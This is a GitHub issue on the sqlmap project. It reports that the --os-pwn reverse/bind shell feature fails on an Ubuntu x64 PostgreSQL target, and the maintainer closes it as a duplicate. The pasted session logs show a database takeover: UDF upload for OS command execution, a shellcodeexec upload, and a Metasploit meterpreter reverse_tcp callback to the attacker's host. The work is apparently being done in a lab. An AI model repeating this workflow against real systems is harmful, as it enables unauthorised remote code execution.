search

sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org
Other
32.61k stars 5.73k forks source link

Ubuntu x64 --os-pwn fail #2787

Closed juushya closed 7 years ago

juushya commented 7 years ago

Target OS: Ubuntu x64 fresh install DB: postgresql sqlmap: current version

It is possible to execute OS commands via --os-cmd. 

---
[09:23:44] [INFO] testing PostgreSQL
[09:23:44] [INFO] confirming PostgreSQL
[09:23:44] [INFO] the back-end DBMS is PostgreSQL
web application technology: Apache, PHP 5.4.36
back-end DBMS: PostgreSQL
[09:23:44] [INFO] testing if current user is DBA
[09:23:44] [INFO] detecting back-end DBMS version from its banner
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 2
[09:23:47] [INFO] checking if UDF 'sys_eval' already exist
[09:23:47] [INFO] checking if UDF 'sys_exec' already exist
UDF 'sys_exec' already exists, do you want to overwrite it? [y/N] y
[09:23:49] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)                
[09:23:49] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
[09:23:50] [INFO] the local file '/tmp/sqlmapeOrWpa12055/lib_postgresqludf_sys6PjOyJ.so' and the remote file '/tmp/libsubmb.so' have the same size (6152 B)
[09:23:50] [INFO] creating UDF 'sys_eval' from the binary UDF file
[09:23:50] [INFO] creating UDF 'sys_exec' from the binary UDF file
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:    'uid=1001(postgres) gid=1001(postgres) groups=1001(postgres)'
[09:23:51] [INFO] cleaning up the database management system
do you want to remove UDF 'sys_eval'? [Y/n] 
do you want to remove UDF 'sys_exec'? [Y/n] 
[09:23:54] [INFO] database management system cleanup finished
[09:23:54] [WARNING] remember that UDF shared object files saved on the file system can only be deleted manually
[09:23:54] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.26.169'

[*] shutting down at 09:23:54

However, when using --os-pwn to get a shell (reverse/bind)/(regular/Meterpreter), I find that the payload used by sqlmap is linux/x86/. The payload gets uploaded to the target /tmp/ successfully, but getting a shell connection fails.

---
[08:43:48] [INFO] testing PostgreSQL
[08:43:48] [INFO] confirming PostgreSQL
[08:43:48] [INFO] the back-end DBMS is PostgreSQL
web application technology: Apache, PHP 5.4.36
back-end DBMS: PostgreSQL
[08:43:48] [INFO] testing if current user is DBA
[08:43:48] [INFO] detecting back-end DBMS version from its banner
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 2
[08:43:50] [INFO] checking if UDF 'sys_bineval' already exist
[08:43:50] [INFO] checking if UDF 'sys_exec' already exist
[08:43:51] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)                
[08:43:51] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
[08:43:52] [INFO] the local file '/tmp/sqlmapQEjTbS94612/lib_postgresqludf_syscvT3XS.so' and the remote file '/tmp/libsmsvc.so' have the same size (6152 B)
[08:43:52] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[08:43:52] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database underlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Via shellcodeexec (file system way, preferred on 64-bit systems)
> 2
[08:43:55] [INFO] creating Metasploit Framework multi-stage shellcode 
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Bind TCP: Listen on the database host for a connection
> 1
what is the local address? [Enter for '192.168.26.161' (detected)] 
which local port number do you want to use? [36571] 
which payload do you want to use?
[1] Shell (default)
[2] Meterpreter (beta)
> 2
[08:44:04] [INFO] creation in progress ........ done
[08:44:12] [INFO] uploading shellcodeexec to '/tmp/tmpsezogf'
[08:44:13] [INFO] the local file '/tmp/sqlmapQEjTbS94612/shellcodeexec_WNwvg.x64' and the remote file '/tmp/tmpsezogf' have the same size (5160 B)
[08:44:13] [INFO] shellcodeexec successfully uploaded
[08:44:13] [INFO] running Metasploit Framework command line interface locally, please wait..
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

       =[ metasploit v4.15.2-dev                          ]
+ -- --=[ 1669 exploits - 968 auxiliary - 294 post        ]
+ -- --=[ 486 payloads - 40 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

PAYLOAD => linux/x86/meterpreter/reverse_tcp
EXITFUNC => process
LPORT => 36571
LHOST => 192.168.26.161
[*] Started reverse TCP handler on 192.168.26.161:36571 
[*] Starting the payload handler...
[08:44:24] [INFO] running Metasploit Framework shellcode remotely via shellcodeexec, please wait..
[08:46:13] [CRITICAL] timeout occurred while attempting to open a remote session

[*] shutting down at 08:46:13

I have tried different bind & reverse, on different ports. Am I missing something here..?

stamparm commented 7 years ago

Duplicate of #2173. I'll eventually do this. Problem is the transferring and running of x64 shellcode code. Please read comments there to learn about the issue